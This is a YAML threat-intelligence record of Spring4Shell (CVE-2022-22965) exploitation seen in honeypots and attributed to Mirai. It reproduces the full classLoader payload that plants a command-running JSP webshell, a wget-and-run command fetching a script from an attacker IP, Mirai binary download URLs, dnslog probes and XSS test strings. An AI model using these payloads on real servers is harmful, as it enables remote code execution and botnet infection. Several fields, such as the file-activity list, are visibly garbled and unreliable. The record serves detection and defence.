description: Activities related to the Spring4Shell vulnerability (CVE-2022-22965)
  were observed in honeypot data, including webshell uploads and test file access
  attempts.
attribution: Mirai botnet
malware_families:
- Mirai
TTPs:
  commandline:
  - echo%20ddfdsfasdfasd
  - echo%20fdsafasdfasd
  - echo%202222222
  - ls
  - ls%20/tmp/
  - whoami
  - %2Fbin%2Fsh%2F-c%24%7BIFS%7D%27cd%24%7BIFS%7D%2Ftmp%3Bwget%24%7BIFS%7Dhttp%3A%2F%2F107.174.133.167%2Ft.sh%24%7BIFS%7D-O-%A6sh%24%7BIFS%7DSpringCore%3B%27cat+/etc/passwd
  - curl+http://111.4vcrkb.dnslog.cn/1.jpg
  - curl+http://12121.4vcrkb.dnslog.cn/1.jpg
  - curl+http://35456.4vcrkb.dnslog.cn/1.jpg
  - echo 8888888888
  - echo %USERNAME%
  - echo %computername%
  - echo </xss>
  - echo fucker_test_test
  - echo rinima
  - echo%20%3Csvg%20onload=confirm`xss`%3E
  - echo%20%3Csvg%20onload=confirm`xsssssss`%3E
  - expidifconfig
  - ls%20/tmp/
  - ping -n 2 uup0fk.dnslog.cn
  - ping uup0fk.dnslog.cn
  - unamewhoami
  - whoami%0A
  - echo+22222
  - echo+`whoami`
  - echo+whoami
  scripting_engine:
  - class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=222
  - Java
  network_connections:
  - 'destination: http://107.174.133.167/gmpsl'
  - 'destination: http://107.174.133.167/gi686'
  - 'destination: http://107.174.133.167/garm'
  - 'destination: http://107.174.133.167/gmips'
  - 'destination: http://107.174.133.167/garm7'
  - 'destination: http://107.174.133.167/gx86'
  - 'destination: http://107.174.133.167/t.sh'
  - 'destination: http://107.174.133.167/garm6'
  - 'destination: http://107.174.133.167/garm5'
  - 'destination: http://15.185.213.122:65123/javachttp://15.185.213.122:65123base64://be3f78b59fa14140b6cc8633bf705a75'
  - 'destination: http://15.185.213.122:65123/javabase64://c08fec5682085417b0a039bdf47c38f2'
  processes:
  - BeanWrapperlmpl
  - ParallelWebappClassLoader
  file_activity:
  - /OT/logout.jsptest29%20%20.txtlog101.txt0985763860781234.j5plog_data_9.jspxiaozhan.jspzhuzhuxias.jsp.2023.j5p1122ptwarjsplog147.txtconf.jspqweasd.jsp22269875.j5p22210854.j5plog154.txt22249231.js5p22280751.j5p2021.jsp7875456457
    j5plog112.txt22224348.j5p22240373.jsplog176.txt35456.35p10g103.txtzhuzhuxia jspindexbk
    jspJsplog150.txtlog124.txt22254378.j5ploa162.txt
IOCs:
- 46.175.146.159:16772
- IP1.85.220.54
- 3.239.1.141
- 5.2.69.50
- 14.0.170.249
- 23.128.248.10
- 23.128.248.11
- 23.128.248.12
- 23.128.248.13
- 23.128.248.14
- 23.128.248.15
- 23.128.248.16
- 23.128.248.17
- 23.128.248.19
- 23.128.248.20
- 23.128.248.21
- 23.128.248.22
- 23.128.248.23
- 23.128.248.24
- 23.128.248.25
- 23.128.248.27
- 23.128.248.28
- 23.128.248.29
- 23.128.248.33
- 23.128.248.34
- 23.128.248.38
- 23.128.248.39
- 23.128.248.40
- 23.128.248.41
- 23.128.248.42
- 23.128.248.43
- 23.128.248.44
- 23.128.248.46
- 23.128.248.48
- 23.128.248.50
- 23.128.248.51
- 23.128.248.53
- 23.128.248.54
- 23.128.248.55
- 23.128.248.56
- 23.128.248.57
- 23.128.248.58
- 23.128.248.59
- 23.128.248.60
- 23.128.248.61
- 23.128.248.62
- 23.128.248.63
- 23.128.248.64
- 23.128.248.65
- 23.129.64.130
- 23.129.64.131
- 23.129.64.132
- 23.129.64.133
- 23.129.64.134
- 23.129.64.135
- 23.129.64.136
- 23.129.64.137
- 23.129.64.138
- 23.129.64.139
- 23.129.64.140
- 23.129.64.141
- 23.129.64.142
- 23.129.64.143
- 23.129.64.145
- 23.129.64.146
- 23.129.64.147
- 23.129.64.148
- 23.129.64.149
- 23.129.64.210
- 23.129.64.211
- 23.129.64.212
- 23.129.64.213
- 23.129.64.214
- 23.129.64.215
- 23.129.64.216
- 23.129.64.217
- 23.129.64.218
- 23.129.64.219
- 23.129.64.250
- 23.129.64.251
- 23.129.64.253
- 23.129.64.254
- 23.129.64.255
- 99, 108, 97, 115, 115
authors:
- 'houliuyang, 黄安欣'
reference: https://blog.netlab.360.com/what-our-honeypot-sees-just-one-day-after-the-spring4shell-advisory-en/
date_of_publication: April 01, 2022
file_creation_date: July 07, 2025
